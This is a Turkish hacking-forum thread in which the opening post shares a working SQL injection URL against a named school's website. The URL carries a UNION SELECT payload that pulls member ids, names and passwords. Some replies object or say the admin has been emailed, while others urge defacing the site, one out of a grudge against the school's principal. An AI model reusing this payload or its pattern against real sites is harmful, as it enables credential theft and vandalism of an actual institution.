Bursa Anadolu Lisesi - Sql İnjection
-
http://www.bursaanadolulisesi.k12.tr/okulailebirligi/detaylar_duyurular.asp?id=-1 union select 0,id,ad,sifre from uyeler
.k12.tr ye index atmayın, canım sıkıldığı için paylaşıyorum :D
-
eski tahribat olsaydı millet helal olsun cart curt çekerdi ama yeni tahribatta şöle postlarla karşılasıcaksın.
Ayıp degilmi okul sitesini hackliyosun ? günah olum cehenneme gidersin..
veya Bu yaptıgın çok büyük suç, dileriz seni yakalarlar ve hapse atarlar, ne zararı vardı bu adamların sana ?
ama ben genede tebrikler hocam iyi iş, bas indexi çıplak kadın resmi koy. diyorum
-
admine mail çektim yarın öğlene doğru bu siteyi ne hale sokar millet tahmin ediyorum :)
-
alacakaranlik bunu yazdı:
-----------------------------
admine mail çektim yarın öğlene doğru bu siteyi ne hale sokar millet tahmin ediyorum :)
-----------------------------amacım buydu :D bende mail attım
@Allura
yok be hoca :D bizimki can sıkıntısı
-
bizim lise olsa acımaz koyardım valla =))
hürriyet bursa anadolu lisesi :P
-
Usta sen ne yaptın ya.Ben okuldakilere tepki olması için kaç gündür arıyorum açığını sen bulup admine iletiyosun :s gerçi 15 ağustosda yapmışsın benim durum yeni daha :D
-
edit
Prometheus tarafından 09/Ara/12 03:22 tarihinde düzenlenmiştir -
Prometheus bunu yazdı:
-----------------------------lise3ü burda okudum
şerefsizin önde gideni bi müdürü ve müdür yardımcısı vardı
ama ciddi anlamda şefrefsiz
bana kötü davrandıkları için değil
dağıtın gitsin xD
Aynen ya bende o yüzden niye açığı söyledin diyorum :D hacklersem eğer ki sebepleri o müdürle yardımcısı olacak zaten :@ -
alacakaranlik bunu yazdı:
-----------------------------Sen Çektyisen mail tamamdır dayı admin halleder bu işi :)))
-
liseye giriş sınavına burda girmiştim,pehh zaman...
-
admin hallede biliyor olsa o açık orada kalmazdı zaten.